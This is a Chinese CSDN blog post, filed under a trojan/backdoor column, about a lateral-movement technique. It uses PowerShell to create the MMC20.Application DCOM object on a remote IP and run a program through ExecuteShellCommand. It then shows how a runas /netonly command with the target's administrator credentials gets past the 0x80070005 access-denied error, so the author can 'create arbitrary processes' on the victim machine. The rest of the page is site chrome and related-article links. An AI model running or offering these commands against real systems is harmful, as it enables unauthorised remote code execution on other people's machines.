MMC20.Application远程创建DCOM对象,拒绝访问0x80070005

最新推荐文章于 2024-01-23 12:00:00 发布
最新推荐文章于 2024-01-23 12:00:00 发布
阅读量2.1k 收藏 2
点赞数 3
分类专栏: 木马后门思路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/112365938
版权

关于利用MMC20这个DCOM对象启动进程的方法,网上已经有不少文章了。

我在测试在远程目标机器上创建MMC20对象时,始终提示0x8007005错误

PS测试代码:

$com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.198.133"));
$com = Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0")

在攻击者机器上打开powershell输入上面命令,提示没权限激活远程dcom对象

使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.198.133 中在 COM 类工厂内检索 CLSID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F889} 的远程组件失败,原因是出现以下错误:
 80070005 192.168.198.133。”
所在位置 行:1 字符: 1
+ $com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.A ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : UnauthorizedAccessException

虽然知道出错原因,需要在执行命令时,带入目标机器的管理员用户凭证;

最终通过runas命令解决了这个问题,具体步骤如下:

首先在攻击者机器上,打开cmd,输入以下命令:

runas /netonly /user:victim\administrator powershell

参数解释:

  • victim为目标机器的电脑名称
  • administrator为目标机器的管理员用户

然后根据提示输入目标机器administrator管理员用户的密码;

随后会在攻击者机器上弹出一个powershell窗口,这个powershell控制台默认是带了凭证的,在这个窗口执行前面的ps代码,就可以在目标机器上创建任意进程了;

参考资料:

  • https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py
  • http://talvinen.hatenablog.com/entry/2017/01/10/204132
  • https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P3-Exploitation.html
  • https://www.anquanke.com/post/id/215960
  • https://www.blackhat.com/eu-18/briefings/schedule/#network-defender-archeology-an-nsm-case-study-in-lateral-movement-with-dcom-12534
FFE4
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【网络安全】企业内网中的横向移动
HBohan的博客
08-25 1492
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
OPC一键DCOM配置和手动配置
12-18
OPC一键DCOM配置和手动配置和WinCC通过OPC通道访问浙大中控SUPCON.AdvOPCServer.1的设置,浏览标签,不用手工添加标签变量。 先在客户端运行!!! 客户端操作: 计算机名称可以和服务器不同,这里的用户名默认...
内网环境横向移动——利用DCOM(1)
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-23 1069
这里先提两个概念,COM和DCOMCOM即组件对象模型(Component Object Model,COM) ,是基于 Windows 平台的一套,由一组和组成。COM是许多微软产品和技术,如Windows媒体播放器和Windows Server的基础。一般的对象是由数据成员和作用在其上的方法组成,而组件对象和一般对象虽有相似性,但又有较大不同。组件对象不使用方法而用接口来描述自身。
不能从远程创建com+对象_横向移动使用CLSID调用COM对象进行横向
weixin_39603050的博客
12-13 245
在第一篇横向移动中我们使用了MMC20.APPLICATION COM对象来进行横向移动,其实我们可以思考一个问题,微软的COM不只有MMC20.APPLICATION。https://docs.microsoft.com/en-us/windows/win32/com/com-technical-overviewMicrosoft组件对象模型(COM)定义了一个二进制互操作性标准,用于...
C# 调用MMC组件打开windows服务属性对话框
Coding My Way
06-22 619
一次开发中需要调用系统服务里面的某个服务的属性对话框,方便进行设置操作。探索了好半天,发现以外的比较简单。 使用Microsoft Management Console 2.0简称MMC的COM接口即可轻松调用。 我们首先在引用中找到这个并引用进工程: 然后,我们在代码中编写如下: MMC20.Application appObj = new MMC20.Application(); // 加载服务组件 appObj.Load("services.msc"); // 获取其中的激活的视图 MM
内网渗透测试:利用DCOM进行横向渗透
Innocence_0的博客
08-20 268
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
opc技术及远程访问opc接口.pdf
07-13
实现远程访问OPC接口的关键在于正确配置DCOM(分布式组件对象模型),确保DCOM设置的一致性,以及可能需要调整防火墙设置以允许必要的通信。 在实际应用中,远程访问OPC接口通常需要满足一些条件,比如统一的DCOM...
DCOM.rar_DCOM_DCOM 开发 .pdf_DCOM 开发 pdf_DCOM开发指南
09-14
Visual C++ 6.0 DCOM开发指南.pdf,DCOM技术使用教程
Windows2000远程访问OPC_SERVER_DCOM的配置.doc
07-06
标题提及的文档主要介绍了在Windows 2000操作系统中配置OPC (OLE for Process Control) 服务器通过DCOM (Distributed Component Object Model) 进行远程访问的步骤。OPC是一个工业自动化标准,允许不同软件之间交换...
Android-ExecuteShell是一个可以方便的执行shell命令的Android开源库
08-13
ExecuteShell 是一个可以让你在你的 Android 项目上方便快速使用 shell 指令的开源库
DCOM_Presentation.rar_DCOM_Dcom ppt_dcom p
09-21
分布式组件对象模型(DCOM,Distributed Component Object Model)是一种微软公司开发的技术,它允许软件组件在不同的网络计算环境中相互通信。DCOMCOMComponent Object Model)的扩展,旨在处理分布式系统的...
通讯协议013——你碰到哪些OPC通讯问题?
zhouwl72的博客
07-10 7139
本文对OPC通讯常见问题及处理进行汇总。
导出word 服务器报错修正
期盼的骆驼专栏
03-10 2714
导出word 出现以下错误: 检索 COM 类工厂中 CLSID 为 {000209FF-0000-0000-C000-000000000046} 的组件失败,原因是出现以下错误: 8000401a 因为配置标识不正确,系统无法开始服务器进程。请检查用户名和密码。 (异常来自 HRESULT:0x8000401A)。 这个问题是权限问题。 1.开始-dcomcnfg,启动组件服务
windows提示“为了对电脑进行保护,已经阻止此应用mmc.exe ”
buside的博客
10-21 2377
win10 提示“为了对电脑进行保护,已经阻止此应用“解决办法
关于COM类工厂80070005和8000401a错误分析及解决办法(DCOM)
wyzlwyzl的专栏
11-26 7980
关于COM类工厂80070005和8000401a错误分析及解决办法   问题描述:最近做一个web应用程序需要操作Excel文件,在开发环境下程序测试正常,部署到IIS后程序操作Excel文件,IIS报错,错误出现在创建Excel进程的语句,如下: Application myExcelApp = new ApplicationClass();  IIS提示信息如下: 检索 COM 类
COM组件80070005错误的解决方法
weixin_33850890的博客
08-03 1090
2019独角兽企业重金招聘Python工程师标准>>> ...
C# 原因是出现以下错误: 80070005 拒绝访问。 (异常来自 HRESULT:0x80070005 (E_ACCESSDENIED))。]
m0_51488773的博客
09-23 3394
检索 COM 类工厂中 CLSID 为 {000209FF-0000-0000-C000-000000000046} 的组件失败,原因是出现以下错误: 80070005 拒绝访问。问题:检索 COM 类工厂中 CLSID 为 {XXXXXXXXXXXXX} 的组件失败,原因是出现以下80070005拒绝访问。组件服务--》计算机--》我的电脑--》DCOM配置--》Microsoft Excel Application 右击属性对话框 标识:交互式用户 安全 三个都编辑好全部允许权限。
DCOM配置详解:跨平台远程访问指南
DCOM配置手册是一份详细的指南,主要针对主流操作系统如Windows 7下的DCOM(分布式组件对象模型)配置流程,特别是在OPC(开放平台通信)环境中实现远程访问。OPC是一种工业标准接口,用于设备监控和数据交换,而...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值